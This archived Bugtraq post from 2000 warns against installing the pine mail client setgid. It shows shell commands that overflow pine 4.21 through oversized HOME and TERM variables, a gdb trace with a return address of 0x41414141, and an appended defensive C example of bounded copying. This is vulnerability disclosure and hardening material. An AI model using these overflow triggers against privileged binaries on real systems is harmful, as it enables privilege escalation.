[15445] in bugtraq
Why pine must never be sgid
daemon@ATHENA.MIT.EDU (Stan Bubrouski)
Fri Jun 23 16:32:16 2000
Message-Id: <20000623143313.18691.qmail@securityfocus.com>
Date: Fri, 23 Jun 2000 14:33:13 -0000
Reply-To: Stan Bubrouski <satan@FASTDIAL.NET>
From: Stan Bubrouski <satan@FASTDIAL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Pine should never be sgid, yet I see it many times
installed sgid mail on many different UNIX and
Linux systems. Everybody admits pine should not be
sgid, yet I still see it sgid on some distributions.
Why shouldn't it be sgid? A reminder, using pine 4.21,
which is the latest version to my knowledge, as an
example.
[root@king pine]# export HOME=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Segmentation fault (core dumped)
[root@king pine]# gdb pine core
...
Core was generated by `AAAAA'.
Program terminated with signal 11, Segmentation fault.
...
(gdb) where
#0 0x809e273 in strcpy () at ../sysdeps/generic/strcpy.c:30
#1 0x4eb6 in ?? ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb)
And another:
[root@king pine]# export TERM=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Can't open termcap file; check TERMCAP variable and/or
system manager.
Segmentation fault (core dumped)
There are countless more. I know everybody knows this
already, so why is pine still sgid on some systems?
-Stan Bubrouski
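
The backtrace in the message above ends in strcpy() with a return address of 0x41414141, which is consistent with an environment value being copied into fixed-size storage without a length check. The C below is an added example, not pine's code and not part of the original post: it shows a bounded copy that rejects oversized environment values, plus a check for set-id execution. The function names, the buffer size and the fail-closed policy are assumptions made for illustration.

```c
#include <limits.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef PATH_MAX
#define PATH_MAX 4096   /* assumed fallback when the platform does not define it */
#endif

/* Non-zero when the effective uid/gid differs from the real one, i.e. the
   process was started from a set-uid or set-gid binary and every environment
   variable is input from a less privileged caller. */
int running_setid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Copy an environment-supplied string into dst. Oversized values are
   rejected rather than truncated, so a 10000-byte HOME or TERM never reaches
   a fixed buffer. Returns 0 on success, -1 on NULL, empty or oversized input. */
int copy_env_value(char *dst, size_t dstlen, const char *value)
{
    const char *end;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (value == NULL || value[0] == '\0')
        return -1;
    end = memchr(value, '\0', dstlen);  /* scans at most dstlen bytes */
    if (end == NULL)
        return -1;                      /* terminator would not fit: reject */
    memcpy(dst, value, (size_t)(end - value) + 1);
    return 0;
}

/* Hypothetical startup step: refuse to run when HOME does not fit. */
int main(void)
{
    char home[PATH_MAX];

    if (copy_env_value(home, sizeof home, getenv("HOME")) != 0)
        return 1;                       /* fail closed instead of overflowing */
    return running_setid() ? 2 : 0;     /* exit code 2 flags set-id execution */
}
```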